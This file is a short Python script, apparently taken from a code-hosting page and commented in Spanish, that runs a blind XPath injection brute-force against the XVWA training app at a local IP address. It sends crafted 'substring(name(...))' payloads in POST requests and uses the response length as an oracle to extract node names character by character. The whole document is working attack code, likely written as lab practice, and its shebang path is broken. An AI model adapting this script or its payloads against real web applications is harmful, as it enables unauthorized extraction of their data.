70 lines
1.3 KiB
Python
70 lines
1.3 KiB
Python
|
#!/var/bin/env python
|
||
|
|
|
||
|
|
|
||
|
|
import pdb
|
||
|
|
import requests
|
||
|
|
import signal
|
||
|
|
import string
|
||
|
|
import sys
|
||
|
|
import time
|
||
|
|
|
||
|
|
from pwn import *
|
||
|
|
|
||
|
|
# Ctrl-C handler
|
||
|
|
|
||
|
|
|
||
|
|
def signal_handler(signal, frame):
|
||
|
|
|
||
|
|
print('\n\n[!] Ctrl-C. Saliendo...')
|
||
|
|
sys.exit(1)
|
||
|
|
|
||
|
|
|
||
|
|
signal.signal(signal.SIGINT, signal_handler)
|
||
|
|
|
||
|
|
|
||
|
|
# Variables globales
|
||
|
|
|
||
|
|
main_url = "http://192.168.1.142/xvwa/vulnerabilities/xpath/"
|
||
|
|
characters = string.ascii_letters
|
||
|
|
|
||
|
|
|
||
|
|
def xPathInjection():
|
||
|
|
|
||
|
|
data = ""
|
||
|
|
|
||
|
|
p1 = log.progress("Inyeccion XPath")
|
||
|
|
p1.status("Iniciando ataque de fuerza bruta")
|
||
|
|
|
||
|
|
time.sleep(2)
|
||
|
|
|
||
|
|
p2 = log.progress("Data")
|
||
|
|
|
||
|
|
for position in range(1, 8):
|
||
|
|
|
||
|
|
for character in characters:
|
||
|
|
# post_data = {
|
||
|
|
# 'search': "1' and substring(name(/*[1]),%d,1)='%s" % (position, character),
|
||
|
|
# 'submit': ''
|
||
|
|
# }
|
||
|
|
|
||
|
|
post_data = {
|
||
|
|
'search': "1' and substring(name(/*[1]/*[1]),%d,1)='%s" % (position, character),
|
||
|
|
'submit': ''
|
||
|
|
}
|
||
|
|
|
||
|
|
r = requests.post(main_url, data=post_data)
|
||
|
|
|
||
|
|
if len(r.text) != 8686:
|
||
|
|
|
||
|
|
data += character
|
||
|
|
p2.status(data)
|
||
|
|
break
|
||
|
|
|
||
|
|
p1.success("Inyeccion XPath completada")
|
||
|
|
p2.success("Data: %s" % data)
|
||
|
|
|
||
|
|
|
||
|
|
if __name__ == "__main__":
|
||
|
|
|
||
|
|
xPathInjection()
|